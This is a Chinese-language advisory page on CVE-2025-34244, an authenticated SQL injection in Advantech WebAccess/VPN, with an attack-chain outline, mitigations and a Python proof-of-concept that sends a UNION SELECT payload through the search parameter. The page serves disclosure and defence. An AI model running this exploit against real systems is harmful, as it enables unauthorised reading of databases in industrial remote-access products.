CVE-2025-34244: Advantech WebAccess/VPN SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-34244

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Advantech WebAccess/VPN

漏洞概述

CVE-2025-34244是Advantech WebAccess/VPN产品中的一个中等严重性SQL注入漏洞。该漏洞存在于AjaxFwRulesController.ajaxDeviceFwRulesAction()函数中，攻击者可以通过datatable搜索参数注入恶意SQL代码。值得注意的是，攻击者只需要拥有低权限的观察者用户账户即可利用此漏洞，成功利用后可导致数据库信息泄露。Advantech WebAccess/VPN是一款广泛应用于工业控制系统的远程访问和VPN解决方案，因此该漏洞可能对关键基础设施造成安全风险。漏洞影响版本低于1.1.5，建议用户尽快升级到最新版本以修复此安全问题。

技术细节

该SQL注入漏洞位于Advantech WebAccess/VPN的AjaxFwRulesController.ajaxDeviceFwRulesAction()方法中。漏洞的根本原因在于该函数在处理datatable搜索参数时未对用户输入进行充分的SQL语句过滤和参数化处理。攻击者作为已认证的低权限观察者用户，可以通过构造特殊的搜索参数值，在原本正常的查询语句中注入额外的SQL语句片段。由于应用程序直接将这些未经验证的用户输入拼接到SQL查询中，攻击者可以执行任意SQL查询，包括读取数据库中的敏感信息。CVSS 3.1评分6.5（中等），主要影响机密性（C:H），允许攻击者获取数据库信息，但不对完整性和可用性造成直接威胁（I:N/A:N）。攻击向量为网络可利用（AV:N），攻击复杂度低（AC:L），需要低权限认证（PR:L），无需用户交互（UI:N）。

攻击链分析

STEP 1

1

攻击者获取目标系统中一个低权限的观察者用户账户

STEP 2

2

使用获取的凭据登录Advantech WebAccess/VPN系统

STEP 3

3

构造恶意SQL注入payload，通过datatable搜索参数（如search[value]）注入UNION SELECT语句

STEP 4

4

向AjaxFwRulesController/ajaxDeviceFwRulesAction端点发送POST请求

STEP 5

5

服务器将未过滤的用户输入拼接到SQL查询中执行

STEP 6

6

攻击者接收包含数据库敏感信息的响应，如数据库版本、表结构等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-34244 PoC - Advantech WebAccess/VPN SQL Injection
Note: This PoC is for educational and authorized testing purposes only.
"""

import requests
import sys

def exploit_sqli(target_url, username, password):
    """
    Exploit SQL injection in Advantech WebAccess/VPN
    via AjaxFwRulesController.ajaxDeviceFwRulesAction()
    """
    # Login to obtain session cookie
    login_url = f"{target_url}/api/login"
    login_data = {
        "username": username,
        "password": password
    }
    
    session = requests.Session()
    try:
        login_response = session.post(login_url, json=login_data, timeout=10)
        if login_response.status_code != 200:
            print("[-] Login failed")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return None
    
    # SQL Injection payload in search parameter
    sqli_endpoint = f"{target_url}/AjaxFwRulesController/ajaxDeviceFwRulesAction"
    sqli_payload = {
        "search[value]": "' UNION SELECT NULL,NULL,version(),NULL,NULL,NULL,NULL--",
        "start": 0,
        "length": 10
    }
    
    try:
        response = session.post(sqli_endpoint, json=sqli_payload, timeout=10)
        if response.status_code == 200:
            print("[+] SQL Injection successful!")
            print(f"[+] Response: {response.text}")
            return response.json()
    except requests.exceptions.RequestException as e:
        print(f"[-] Exploit error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <target_url> <username> <password>")
        print("Example: python3 exploit.py https://vpn.example.com lowpriv_user password123")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    exploit_sqli(target, user, pwd)

影响范围

Advantech WebAccess/VPN < 1.1.5

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）限制对WebAccess/VPN管理界面的网络访问，仅允许受信任的IP地址访问；2）监控和审计所有AjaxFwRulesController相关的请求日志；3）考虑暂时禁用非必要的观察者账户；4）部署WAF规则阻止已知的SQL注入攻击模式。但这些措施仅为临时解决方案，最终仍需升级到修复版本。